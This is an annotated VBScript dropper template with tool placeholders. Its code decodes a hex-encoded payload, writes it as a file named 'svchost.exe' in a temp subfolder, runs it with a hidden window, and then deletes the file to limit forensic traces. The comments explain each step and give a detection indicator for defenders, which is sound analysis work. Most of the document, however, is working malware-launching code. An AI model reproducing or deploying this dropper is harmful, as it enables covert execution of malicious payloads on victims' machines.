' Script template: the %{...} tokens are placeholders, presumably substituted
' by the generating tool before the script is used (confirm against the generator).
'
' The function decodes a hex string into bytes, writes them to a file named
' "svchost.exe" inside a freshly created subfolder of the temp folder, runs that
' file with a hidden window, waits for it to exit, then deletes the file and folder.
'
' Defender view: the observable behaviour is a script host creating an
' executable under the temp folder and launching it. The file borrows the name
' of a Windows system process, so a process called svchost.exe with an image
' path outside the system directory is the indicator to alert on.
Function %{var_func}()
    ' Hex-encoded payload; the loop below consumes it two characters at a time.
    %{var_shellcode} = "%{var_hex_shellcode}"

    Dim %{var_obj}
    Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
    Dim %{var_stream}
    Dim %{var_tempdir}
    Dim %{var_tempexe}
    Dim %{var_basedir}
    ' GetSpecialFolder(2) returns the TemporaryFolder (the TMP location).
    Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
    ' GetTempName() supplies a generated name, used here as a per-run folder name.
    %{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
    %{var_obj}.CreateFolder(%{var_basedir})
    ' Fixed file name that imitates a Windows system binary (see header note).
    %{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
    ' CreateTextFile(path, overwrite, unicode): overwrite = true, unicode = false,
    ' so the stream is opened as non-Unicode text.
    Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
    ' Each pair of hex digits is prefixed with "&H", parsed by CLng, and written
    ' as the character with that code.
    ' NOTE(review): intended as one output byte per pair; how character codes
    ' above 127 are written through a text stream depends on the system code
    ' page - confirm.
    For i = 1 to Len(%{var_shellcode}) Step 2
        %{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))
    Next
    %{var_stream}.Close
    Dim %{var_shell}
    Set %{var_shell} = CreateObject("Wscript.Shell")
    ' Run(command, windowStyle, waitOnReturn): 0 hides the window, true blocks
    ' until the launched process exits.
    %{var_shell}.run %{var_tempexe}, 0, true
    ' Cleanup runs only after the process has exited, so the dropped file exists
    ' on disk for the lifetime of that process and is gone afterwards. File- and
    ' process-creation telemetry will record it; a later disk inspection will not.
    %{var_obj}.DeleteFile(%{var_tempexe})
    %{var_obj}.DeleteFolder(%{var_basedir})
End Function
' Template placeholder at script top level, filled in by the generating tool.
' NOTE(review): presumably expands to the statement that invokes the function
' defined in this file - confirm against the generator.
%{init}